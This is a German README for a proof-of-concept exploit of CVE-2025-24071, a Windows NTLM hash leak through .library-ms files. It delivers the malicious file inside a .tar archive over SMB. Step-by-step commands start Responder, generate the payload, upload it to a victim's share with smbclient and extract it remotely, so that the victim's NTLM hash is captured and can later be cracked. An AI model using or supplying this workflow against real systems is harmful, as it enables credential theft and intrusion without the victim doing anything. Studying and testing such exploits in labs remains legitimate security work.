
Ausgenutzte CVE-2025-24071 über SMB, indem eine .library-ms-Datei in einem .tar-Archiv gehostet wird. Mit tar x von smbclient wird die Nutzlast serverseitig ohne Benutzerinteraktion extrahiert. Responder erfasst den NTLM-Hash, sobald das Ziel auf die Bibliothek zugreift.
Dies ist ein PoC zur Ausnutzung von CVE-2025-24071, einer Schwachstelle in Windows, die NTLM-Hash-Leakage über .library-ms-Dateien ermöglicht. Diese Version weicht leicht von anderen ab, indem sie ein .tar-Archiv anstelle eines .zip verwendet, was die Kompatibilität in reinen SMB-Umgebungen verbessert.
.tar statt .zip?Die meisten öffentlichen PoCs verwenden .zip, um die bösartige .library-ms-Datei zu verpacken. Wenn Sie jedoch in einer eingeschränkten SMB-Umgebung arbeiten (z. B. nur Zugriff über smbclient), können ZIP-Dateien nicht remote extrahiert werden. Durch die Verwendung eines .tar-Archivs können Sie die Nutzlast direkt von der SMB-Freigabe mit dem in smbclient integrierten tar-Befehl extrahieren, was eine ferne Bereitstellung ohne Benutzerinteraktion ermöglicht.
Responder installiert und läuftResponder, impacket-smbserver oder samba)Starten Sie Responder auf dem richtigen Interface:
sudo responder -I <interface>
Stellen Sie sicher, dass die IP in der Nutzlast mit diesem Interface übereinstimmt.
python3 create_tar_poc.py
Sie werden aufgefordert, Folgendes einzugeben:
Dies erzeugt:
Von Ihrem Angreifer-Rechner aus verbinden Sie sich mit der SMB-Freigabe des Opfers über smbclient:
smbclient //<victim_ip>/<sharename> -U <USERNAME>
put exploit.tar
tar x exploit.tar
Dies wird die .library-ms auf die Freigabe entpacken.
Wenn der exploit.tar extrahiert wird, stellt die .library-ms-Datei, die eine bösartige XML enthält, eine Verbindung zu unserem SMB her, dem aktiven Responder auf unserem Rechner, und initiiert so einen Authentifizierungsversuch unter Verwendung von NTLM, indem sie eine Anfrage mit dem Benutzernamen, der Domäne und dem NTLM-Hash des Benutzerpassworts sendet, den wir später entschlüsseln können.
Demnächst verfügbar...
Daniel Miranda Barcelona AKA Excal1bur | Basierend auf der Originalarbeit von 0x6rss, angepasst für TAR-basierte SMB-Bereitstellungen in Laborszenarien.